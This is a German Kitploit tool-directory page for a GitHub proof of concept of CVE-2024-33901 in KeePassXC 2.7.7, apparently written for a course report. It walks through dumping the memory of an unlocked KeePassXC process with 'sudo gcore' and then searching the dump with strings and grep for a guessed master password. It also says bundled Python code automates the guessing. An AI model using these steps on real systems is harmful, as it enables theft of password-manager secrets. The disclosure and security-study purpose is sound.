Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-33901-ProofOfConcept — Kurzes Programm, das die Sicherheitslücke CVE-2024-33901 in KeePassXC Version 2.7.7 demonstriert | Kitploit
Tools/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
Passwort-CrackingSpeicherforensikSchwachstellenanalyseExploitationDatenexfiltrationDigitale Forensik
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

Kurzes Programm, das die Sicherheitslücke CVE-2024-33901 in KeePassXC Version 2.7.7 demonstriert

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 1 JahrNoch nicht geprüft

CVE-2024-33901-ProofOfConcept

Kurzes Programm, das die Sicherheitslücke CVE-2024-33901 in KeePassXC Version 2.7.7 demonstriert

Der Bericht für den Kurs benötigt möglicherweise den verknüpften Quellcode, daher habe ich das Repository dafür erstellt

So reproduzieren Sie die Schwachstelle

  1. Öffnen Sie KeePassXC und authentifizieren Sie die Datenbank
  2. Während die Datenbank authentifiziert ist, erstellen Sie eine Speicherabbilddatei dafür

Dies kann erreicht werden, indem die PID ermittelt wird, was mit diesem Befehl erfolgen kann:

root@kitploit:~
ps aux | grep keepassxc

Und dann führen Sie diesen Befehl aus: sudo gcore -o keepassxc_dump PID_HERE

Zum Beispiel, wenn die ermittelte PID 1234 war, dann müsste der Befehl lauten:

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. Abschließend können Sie diesen Befehl ausführen: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

Wenn die PID also 1234 war, wäre der Befehl:

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

Sobald die Speicherabbilddatei erstellt ist, kann der Angriff durchgeführt werden, selbst wenn die Datenbank erneut gesperrt wird oder KeePassXC geschlossen wird.

Der bereitgestellte Python-Code führt alle diese Schritte aus und versucht mehrere Passwort-Raten basierend auf den bereitgestellten Textdateien.

Tool herunterladen